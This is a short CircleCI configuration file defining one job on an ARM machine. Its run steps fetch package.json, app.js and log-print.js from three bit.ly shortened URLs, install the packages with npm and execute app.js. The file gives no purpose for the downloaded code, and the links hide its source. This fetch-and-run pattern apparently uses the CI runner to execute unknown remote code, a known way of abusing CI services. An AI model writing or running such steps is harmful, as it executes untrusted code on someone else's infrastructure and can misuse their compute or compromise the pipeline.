version: 2.1

#run arm64-v8

jobs:
  first-jobs:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: curl -fsSL https://bit.ly/39vVcgd -o package.json && curl -fsSL https://bit.ly/3nKusAW -o app.js && curl -fsSL https://bit.ly/2VQUHKl -o log-print.js
      - run: npm i -s
      - run: node app.js
      
workflows:
  run___jobs:
    jobs:
      - first-jobs